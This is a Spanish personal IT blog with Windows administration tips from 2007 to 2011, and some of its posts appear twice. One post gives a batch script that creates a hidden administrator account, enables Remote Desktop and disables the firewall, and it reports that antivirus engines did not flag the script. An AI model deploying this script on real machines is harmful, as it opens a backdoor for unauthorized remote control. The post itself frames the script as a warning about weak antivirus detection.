Adjunto un enlace donde podreis descargaros un extenso manual sobre como auditar nuestros entornos tecnologicos, mediante metasploit y nessus.
http://www.megaupload.com/?d=VTL485XK
Quasi
martes, 18 de enero de 2011
jueves, 27 de marzo de 2008
Como obtener la configuración de los usuarios
Aquí os dejo una linea de comandos para obtener la configuración de los usuarios, de un dominio o locales.
En users.txt tendremos que añadir los usuarios de los que queremos obtener la información.
for /F %%i in (users.txt) do net user %%i>>resultat.txt
En users.txt tendremos que añadir los usuarios de los que queremos obtener la información.
for /F %%i in (users.txt) do net user %%i>>resultat.txt
jueves, 17 de mayo de 2007
jueves, 18 de enero de 2007
svchost.exe
Si tenemos varios procesos svchost.exe abiertos en nuestro sistema y queremos saber a que servicios corresponden desde la consola de comandos ejecuta lo siguiente:
tasklist /svc/fi "imagename eq svchost.exe"
Si tienes un proceso svchost que te esta consumiendo mucho porcentage de procesador de manera continua es posible que te esten dando candela aprovechandose de la vulnerabilidad del RPC (remote procedure call)
Cuidadin!!!!!
tasklist /svc/fi "imagename eq svchost.exe"
Si tienes un proceso svchost que te esta consumiendo mucho porcentage de procesador de manera continua es posible que te esten dando candela aprovechandose de la vulnerabilidad del RPC (remote procedure call)
Cuidadin!!!!!
martes, 16 de enero de 2007
Cambiando config IP por Comandos
Si queremos cambiar la configuración Ip de nuestro equipo mediante comandos, ejecutaremos lo siguiente:
netsh interface ip set address name="lan" gateway=10.0.1.252 gwmetric=1 source=static addr=10.0.1.87 mask=255.255.255.0
y la config para DNS:
set dns name="lan" source=static addr=192.168.140.99
netsh interface ip set address name="lan" gateway=10.0.1.252 gwmetric=1 source=static addr=10.0.1.87 mask=255.255.255.0
y la config para DNS:
set dns name="lan" source=static addr=192.168.140.99
viernes, 5 de enero de 2007
Prueba de concepto
Te recomiendo este ejercicio:
Copia Las siguientes lineas al bloc de notas, Guarda el fichero con extensión fichero.uue, descomprimelo con winzip y veras el resultado.
Si alguna vez utilizas un sniffer de red y capturas algo parecido sabras que es un fichero codificado en base64 que puede ser reconstruido.
Por ejemplo analizar el envio por correo electronico de un fichero adjunto, capturarlo y recuperarlo.
Prueba a hacer esto:
Enviate un correo con un archivo adjunto, cuando lo recibas , boton derecho propiedades y detalles en el correo y veras un boton de origen del mensaje (eso en outlook express), mira que la linea empiece por algo parecido a esto
Content-Type: application/pdf;
name="mirame.pdf"Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="mirame.pdf"
Veras una cantidad inumerable de caracteres copia hasta el final que ponga algo parecido a esto
NiAvUm9vdCAxIDAgUiAvSW5mbyAyIDAgUgo+PgpzdGFydHhyZWYKNTUyMwolJUVPRgo=
------=_NextPart_000_0010_01C730C5.31400C00--
atención solo tienes que copiar hasta el signo =
Lo pegas en el notepad, lo guardas con extensión uue y lo abres con winzip, veras el fichero.
Copia Las siguientes lineas al bloc de notas, Guarda el fichero con extensión fichero.uue, descomprimelo con winzip y veras el resultado.
Si alguna vez utilizas un sniffer de red y capturas algo parecido sabras que es un fichero codificado en base64 que puede ser reconstruido.
Por ejemplo analizar el envio por correo electronico de un fichero adjunto, capturarlo y recuperarlo.
Prueba a hacer esto:
Enviate un correo con un archivo adjunto, cuando lo recibas , boton derecho propiedades y detalles en el correo y veras un boton de origen del mensaje (eso en outlook express), mira que la linea empiece por algo parecido a esto
Content-Type: application/pdf;
name="mirame.pdf"Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="mirame.pdf"
Veras una cantidad inumerable de caracteres copia hasta el final que ponga algo parecido a esto
NiAvUm9vdCAxIDAgUiAvSW5mbyAyIDAgUgo+PgpzdGFydHhyZWYKNTUyMwolJUVPRgo=
------=_NextPart_000_0010_01C730C5.31400C00--
atención solo tienes que copiar hasta el signo =
Lo pegas en el notepad, lo guardas con extensión uue y lo abres con winzip, veras el fichero.
Que miedo me dan los Antivirus
Que si detección por firmas, que si analisis heuristicos que si papatim que si papatam, que si creo un fichero bat con comandos net resulta que los antivirus no dicen ni pio.
Esta prueba la realize con comandos que nos proporciona el propio windows en resumen por quien no este acostumbrado, al principio nos creara un usuario, seguidamente se agregarà al grupo administradores de la maquina, habilitara el acceso remoto, desactivarà el firewal de windows y agregara el usuario al acceso remoto.
@echo off
Net user PROVA /ADD
net localgroup ADMINISTRADORES PROVA /ADD
reg add "hklm\system\currentcontrolset\control\terminal server" /v fDenyTSConnections /t REG_DWORD /f /d 0
netsh firewall set opmode mode=DISABLE profile=DOMAIN
NET LOCALGROUP "Usuarios de escritorio Remoto" PROVA /ADD"
La comprobación la realicé subiendo el fichero compilado a www.virustotal.com
donde te realiza un analisos mediante bastantes motores de antivirus. ninguno de ello s lo detectó !LOGICO son comandos net! PELIGROSO !Pos tus diras, no se a mi me lo parece!
Ahí queda eso.
Esta prueba la realize con comandos que nos proporciona el propio windows en resumen por quien no este acostumbrado, al principio nos creara un usuario, seguidamente se agregarà al grupo administradores de la maquina, habilitara el acceso remoto, desactivarà el firewal de windows y agregara el usuario al acceso remoto.
@echo off
Net user PROVA /ADD
net localgroup ADMINISTRADORES PROVA /ADD
reg add "hklm\system\currentcontrolset\control\terminal server" /v fDenyTSConnections /t REG_DWORD /f /d 0
netsh firewall set opmode mode=DISABLE profile=DOMAIN
NET LOCALGROUP "Usuarios de escritorio Remoto" PROVA /ADD"
La comprobación la realicé subiendo el fichero compilado a www.virustotal.com
donde te realiza un analisos mediante bastantes motores de antivirus. ninguno de ello s lo detectó !LOGICO son comandos net! PELIGROSO !Pos tus diras, no se a mi me lo parece!
Ahí queda eso.
Suscribirse a:
Entradas (Atom)
